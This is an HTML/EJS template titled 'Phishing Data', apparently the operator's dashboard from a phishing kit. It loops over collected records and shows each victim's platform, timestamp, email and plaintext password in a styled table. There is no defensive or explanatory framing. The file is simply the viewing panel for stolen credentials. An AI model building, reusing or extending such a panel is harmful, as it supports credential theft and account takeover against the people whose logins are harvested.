<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    <link
      href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css"
      rel="stylesheet"
    />
  </head>
  <body>
    <div
      class="w-full h-24 bg-black text-white flex justify-center items-center"
    >
      <h1>Phishing Data</h1>
    </div>
    <div class="relative overflow-x-auto shadow-md sm:rounded-lg">
      <table
        class="w-full text-sm text-left rtl:text-right text-gray-500 dark:text-gray-400"
      >
        <thead
          class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400"
        >
          <tr>
            <th scope="col" class="px-6 py-3">Platform</th>
            <th scope="col" class="px-6 py-3">createdAt</th>
            <th scope="col" class="px-6 py-3">Email</th>
            <th scope="col" class="px-6 py-3">Password</th>
          </tr>
        </thead>
        <% data.forEach(item =>{ %>
        <tbody>
          <tr
            class="odd:bg-white odd:dark:bg-gray-900 even:bg-gray-50 even:dark:bg-gray-800 border-b dark:border-gray-700 overflow-hidden overflow-x-scroll"
          >
            <td class="px-6 py-4"><%= item.platform %></td>
            <td class="px-6 py-4"><%= item.createdAt %></td>
            <td class="px-6 py-4"><%= item.Email %></td>
            <td class="px-6 py-4"><%= item.Password %></td>
          </tr>
        </tbody>
        <% }); %>
      </table>
    </div>
  </body>
</html>
